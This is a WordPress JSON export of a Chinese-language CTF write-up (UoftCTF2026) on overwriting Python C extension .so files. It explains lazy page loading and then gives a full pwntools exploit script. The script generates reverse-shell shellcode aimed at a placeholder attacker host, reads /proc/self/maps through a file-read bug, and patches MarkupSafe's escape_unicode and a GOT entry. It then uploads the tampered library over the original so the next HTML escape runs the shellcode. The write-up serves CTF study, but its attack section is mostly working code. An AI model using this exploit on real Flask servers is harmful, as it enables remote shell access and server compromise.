{"id":519,"date":"2026-01-12T16:15:15","date_gmt":"2026-01-12T16:15:15","guid":{"rendered":"http:\/\/101.42.175.115\/wordpress\/?p=519"},"modified":"2026-01-12T16:15:16","modified_gmt":"2026-01-12T16:15:16","slug":"c-%e6%89%a9%e5%b1%95%e6%a8%a1%e5%9d%97%e8%a6%86%e7%9b%96","status":"publish","type":"post","link":"http:\/\/101.42.175.115\/wordpress\/?p=519","title":{"rendered":"c \u6269\u5c55\u6a21\u5757\u8986\u76d6"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">c \u6269\u5c55\u6a21\u5757<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Python \u4e2d\u7684\u4e00\u4e9b\u5e93\u5b58\u5728 C \u6269\u5c55\u6a21\u5757\uff0c\u7528\u4e8e\u63d0\u5347\u6027\u80fd\u3002Linux \u4e2d\u7684 C \u6269\u5c55\u6a21\u5757\u662f .so \u6587\u4ef6\uff0c\u4f8b\u5982\uff1a_speedups.cpython-312-x86_64-linux-gnu.so\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">\u5ef6\u8fdf\u52a0\u8f7d\u4e0e\u6309\u9875\u8bfb\u53d6<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u9875\uff08Page\uff09\uff1a\u5185\u5b58\u7ba1\u7406\u7684\u6700\u5c0f\u5355\u4f4d\uff0c\u901a\u5e38 4KB\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.so \u6587\u4ef6\u901a\u8fc7 mmap \u6620\u5c04\u5230\u8fdb\u7a0b\u5730\u5740\u7a7a\u95f4\uff0c\u4f46\u4e0d\u4f1a\u7acb\u5373\u8bfb\u53d6\u3002\u53ea\u6709\u5f53 python \u8fdb\u7a0b\u5728\u8fd0\u884c\u8fc7\u7a0b\u4e2d cpu \u8bbf\u95ee\u67d0\u4e2a\u5730\u5740\u65f6\uff0c\u89e6\u53d1\u7f3a\u9875\u5f02\u5e38\uff0c\u624d\u4f1a\u5c06\u8be5\u5730\u5740\u6240\u5728\u7684\u9875\u4ece\u78c1\u76d8\u4e0a\u7684 so \u6587\u4ef6\u8bfb\u5165\u5185\u5b58\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">c \u6269\u5c55\u6a21\u5757\u8986\u76d6\u7684\u5b9e\u73b0<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5 MarkupSafe \u5e93\u4e2d escape_unicode()\u4e3a\u4f8b\u3002Flask \u7684 render_template_string()\u4f1a\u8c03\u7528 escape()\u51fd\u6570\uff0cescape()\u5185\u90e8\u8c03\u7528 escape_unicode() \u8fdb\u884c HTML \u8f6c\u4e49\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u653b\u51fb\u8005\u901a\u8fc7\u8986\u76d6\u78c1\u76d8\u4e0a\u7684 .so \u6587\u4ef6\uff0c\u6709\u4e24\u79cd\u53ef\u80fd\u5b9e\u73b0\u653b\u51fb\u7684\u65b9\u5f0f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7528 shellcode \u66ff\u6362 escape_unicode()\u7684\u51fd\u6570\u4f53<\/li>\n\n\n\n<li>\u6216\u4fee\u6539 escape_unicode()\u5185\u90e8\u8c03\u7528\u7684 libc \u51fd\u6570\uff08\u5982 strlen\uff09\u7684 GOT \u8868\u9879\uff0c\u6307\u5411 shellcode \u5f53 Python \u8fdb\u7a0b\u4e0b\u6b21\u8fdb\u884c HTML \u8f6c\u4e49\u65f6\uff0c\u5982\u679c\u88ab\u4fee\u6539\u7684\u9875\u9762\u5c1a\u672a\u52a0\u8f7d\u5230\u5185\u5b58\uff0c\u5c31\u4f1a\u4ece\u4fee\u6539\u540e\u7684\u6587\u4ef6\u8bfb\u53d6\uff0c\u89e6\u53d1 shellcode \u6267\u884c\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5 UoftCTF2026 \u4e3a\u4f8b\uff0c\u8fd9\u9053\u9898\u76ee\u5728\u6743\u9650\u8303\u56f4\u5185\u53ef\u4ee5\u5b9e\u73b0\u4efb\u610f\u6587\u4ef6\u8bfb\u548c\u4efb\u610f\u6587\u4ef6\u5199\uff0c\u5c06 python \u89e3\u91ca\u5668\u73af\u5883\u8bbe\u5b9a\u5728\u4e86\u53ef\u5199\u5165\u7684 \/tmp \u76ee\u5f55\u4e0b\u7684\u865a\u62df\u73af\u5883\u4e2d\uff0cweb \u5e94\u7528\u4e2d\u5b58\u5728 render_template_string()\u5e76\u4e14\u4f1a\u8fdb\u884c HTML \u8f6c\u4e49\uff0c\u4e5f\u5c31\u662f\u8981\u8c03\u7528\u5230 escape_unicode() \u51fd\u6570\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f1a\u89e6\u53d1\u653b\u51fb\u7684\u5b9e\u73b0\u811a\u672c\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import*import requests\n\ncontext.binary = lib = ELF(\"_speedups.cpython-312-x86_64-linux-gnu.so\")\n\n# 1. \u751f\u6210\u53cd\u5411 shell \u7684 shellcode\npayload = asm(f\"\"\"\n    {shellcraft.connect(\"IPHERE\", 8888)}  # \u8fde\u63a5\u653b\u51fb\u8005\u670d\u52a1\u5668\n    {shellcraft.dup2('rdi', 0)}           # \u91cd\u5b9a\u5411 stdin\n    {shellcraft.dup2('rdi', 1)}           # \u91cd\u5b9a\u5411 stdout  \n    {shellcraft.dup2('rdi', 2)}           # \u91cd\u5b9a\u5411 stderr\n    {shellcraft.sh()}                      # \u6267\u884c \/bin\/sh\n\"\"\")\n\n# 2. \u5229\u7528\u8def\u5f84\u904d\u5386\u8bfb\u53d6 \/proc\/self\/maps \u83b7\u53d6\u5185\u5b58\u5e03\u5c40\nmaps = requests.post(\"https:\/\/xxx\/read\", \n    data={\"filename\":\"\/proc\/self\/maps\"}).text.splitlines()\n\n# 3. \u627e\u5230 _speedups.so \u7684\u52a0\u8f7d\u57fa\u5740\nfor line in maps:\n    if \"_speedups.cpython-312-x86_64-linux-gnu.so\" in line &#91;-1&#93;:\n        addr = int(line &#91;0&#93;.split('-')&#91;0&#93;, 16)break\n\n# 4. \u4fee\u6539\u672c\u5730\u7684 .so \u6587\u4ef6\nlib_file = bytearray(open(\"_speedups.cpython-312-x86_64-linux-gnu.so\", 'rb').read())\n\n# 5. \u5c06 escape_unicode \u51fd\u6570\u66ff\u6362\u4e3a shellcode\nlib_file [lib.symbols &#91;'escape_unicode'&#93;:lib.symbols &#91;'escape_unicode'&#93; + len(payload)] = payload\n\n# 6. \u4fee\u6539 GOT \u8868\u9879\uff0c\u6307\u5411 shellcode \u6240\u5728\u5730\u5740\nlib_file &#91;0x30c8:0x30c8+8&#93; = p64(addr + 0x1130)\n\n# 7. \u4e0a\u4f20\u6076\u610f .so \u8986\u76d6\u539f\u6587\u4ef6\nrequests.post(\"https:\/\/xxx\/upload\", files={\n    \"file\": (\"\/tmp\/venv_flask\/lib\/python3.12\/site-packages\/markupsafe\/_speedups.cpython-312-x86_64-linux-gnu.so\", \n             bytes(lib_file))\n})<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #1E754F\">from<\/span><span style=\"color: #393A34\"> pwn <\/span><span style=\"color: #1E754F\">import<\/span><span style=\"color: #AB5959\">*<\/span><span style=\"color: #1E754F\">import<\/span><span style=\"color: #393A34\"> requests<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">context<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">binary <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> lib <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> ELF<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">_speedups.cpython-312-x86_64-linux-gnu.so<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 1. \u751f\u6210\u53cd\u5411 shell \u7684 shellcode<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">payload <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> asm<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #AB5959\">f<\/span><span style=\"color: #B56959\">&quot;&quot;&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">    <\/span><span style=\"color: #A65E2B\">{<\/span><span style=\"color: #393A34\">shellcraft<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">connect<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">IPHERE<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">8888<\/span><span style=\"color: #999999\">)<\/span><span style=\"color: #A65E2B\">}<\/span><span style=\"color: #B56959\">  # \u8fde\u63a5\u653b\u51fb\u8005\u670d\u52a1\u5668<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">    <\/span><span style=\"color: #A65E2B\">{<\/span><span style=\"color: #393A34\">shellcraft<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">dup2<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">rdi<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">0<\/span><span style=\"color: #999999\">)<\/span><span style=\"color: #A65E2B\">}<\/span><span style=\"color: #B56959\">           # \u91cd\u5b9a\u5411 stdin<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">    <\/span><span style=\"color: #A65E2B\">{<\/span><span style=\"color: #393A34\">shellcraft<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">dup2<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">rdi<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><span style=\"color: #999999\">)<\/span><span style=\"color: #A65E2B\">}<\/span><span style=\"color: #B56959\">           # \u91cd\u5b9a\u5411 stdout  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">    <\/span><span style=\"color: #A65E2B\">{<\/span><span style=\"color: #393A34\">shellcraft<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">dup2<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">rdi<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">2<\/span><span style=\"color: #999999\">)<\/span><span style=\"color: #A65E2B\">}<\/span><span style=\"color: #B56959\">           # \u91cd\u5b9a\u5411 stderr<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">    <\/span><span style=\"color: #A65E2B\">{<\/span><span style=\"color: #393A34\">shellcraft<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">sh<\/span><span style=\"color: #999999\">()<\/span><span style=\"color: #A65E2B\">}<\/span><span style=\"color: #B56959\">                      # \u6267\u884c \/bin\/sh<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B56959\">&quot;&quot;&quot;<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 2. \u5229\u7528\u8def\u5f84\u904d\u5386\u8bfb\u53d6 \/proc\/self\/maps \u83b7\u53d6\u5185\u5b58\u5e03\u5c40<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">maps <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> requests<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">post<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">https:\/\/xxx\/read<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #393A34\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">    <\/span><span style=\"color: #B07D48\">data<\/span><span style=\"color: #999999\">={<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">filename<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">\/proc\/self\/maps<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">}).<\/span><span style=\"color: #393A34\">text<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">splitlines<\/span><span style=\"color: #999999\">()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 3. \u627e\u5230 _speedups.so \u7684\u52a0\u8f7d\u57fa\u5740<\/span><\/span>\n<span class=\"line\"><span style=\"color: #1E754F\">for<\/span><span style=\"color: #393A34\"> line <\/span><span style=\"color: #1E754F\">in<\/span><span style=\"color: #393A34\"> maps<\/span><span style=\"color: #999999\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">    <\/span><span style=\"color: #1E754F\">if<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">_speedups.cpython-312-x86_64-linux-gnu.so<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #AB5959\">in<\/span><span style=\"color: #393A34\"> line <\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #AB5959\">-<\/span><span style=\"color: #2F798A\">1<\/span><span style=\"color: #999999\">&#93;:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">        addr <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #998418\">int<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">line <\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #2F798A\">0<\/span><span style=\"color: #999999\">&#93;.<\/span><span style=\"color: #393A34\">split<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">-<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">)&#91;<\/span><span style=\"color: #2F798A\">0<\/span><span style=\"color: #999999\">&#93;,<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">16<\/span><span style=\"color: #999999\">)<\/span><span style=\"color: #1E754F\">break<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 4. \u4fee\u6539\u672c\u5730\u7684 .so \u6587\u4ef6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">lib_file <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #998418\">bytearray<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">open<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">_speedups.cpython-312-x86_64-linux-gnu.so<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">rb<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">).<\/span><span style=\"color: #393A34\">read<\/span><span style=\"color: #999999\">())<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 5. \u5c06 escape_unicode \u51fd\u6570\u66ff\u6362\u4e3a shellcode<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">lib_file <\/span><span style=\"color: #999999\">[<\/span><span style=\"color: #393A34\">lib<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">symbols <\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">escape_unicode<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;:<\/span><span style=\"color: #393A34\">lib<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">symbols <\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">escape_unicode<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #AB5959\">+<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #998418\">len<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">payload<\/span><span style=\"color: #999999\">)]<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> payload<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 6. \u4fee\u6539 GOT \u8868\u9879\uff0c\u6307\u5411 shellcode \u6240\u5728\u5730\u5740<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">lib_file <\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #AB5959\">0x<\/span><span style=\"color: #2F798A\">30c8<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #AB5959\">0x<\/span><span style=\"color: #2F798A\">30c8<\/span><span style=\"color: #AB5959\">+<\/span><span style=\"color: #2F798A\">8<\/span><span style=\"color: #999999\">&#93;<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> p64<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">addr <\/span><span style=\"color: #AB5959\">+<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #AB5959\">0x<\/span><span style=\"color: #2F798A\">1130<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 7. \u4e0a\u4f20\u6076\u610f .so \u8986\u76d6\u539f\u6587\u4ef6<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">requests<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">post<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">https:\/\/xxx\/upload<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">files<\/span><span style=\"color: #999999\">={<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">    <\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">file<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #B56959\">\/tmp\/venv_flask\/lib\/python3.12\/site-packages\/markupsafe\/_speedups.cpython-312-x86_64-linux-gnu.so<\/span><span style=\"color: #B5695999\">&quot;<\/span><span style=\"color: #999999\">,<\/span><span style=\"color: #393A34\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">             <\/span><span style=\"color: #998418\">bytes<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">lib_file<\/span><span style=\"color: #999999\">))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #999999\">})<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc\u505a\u4e86\u4e24\u624b\u51c6\u5907\uff0c\u5bf9 escape_unicode()\u7684\u51fd\u6570\u4f53\u548c escape_unicode()\u5185\u90e8\u8c03\u7528\u7684 libc \u51fd\u6570 GOT \u8868\u9879\u90fd\u8fdb\u884c\u4e86\u8986\u76d6\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"c \u6269\u5c55\u6a21\u5757 Python \u4e2d\u7684\u4e00\u4e9b\u5e93\u5b58\u5728 C \u6269\u5c55\u6a21\u5757\uff0c\u7528\u4e8e\u63d0\u5347\u6027\u80fd\u3002Linux \u4e2d\u7684 C \u6269\u5c55\u6a21\u5757\u662f .so \u6587\u4ef6\uff0c\u4f8b\u5982\uff1a_speedups.cpython-312-x86_64-linux-gnu.so\u3002 \u5ef6\u8fdf\u52a0\u8f7d\u4e0e\u6309\u9875\u8bfb\u53d6 \u9875\uff08Pa......","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[23,1],"tags":[51,39,41,31],"class_list":["post-519","post","type-post","status-publish","format-standard","hentry","category-web-security","category-uncategorized","tag-so","tag-flask","tag-jinja2","tag-python"],"_links":{"self":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/519","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=519"}],"version-history":[{"count":2,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/519\/revisions"}],"predecessor-version":[{"id":521,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/519\/revisions\/521"}],"wp:attachment":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=519"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=519"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=519"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}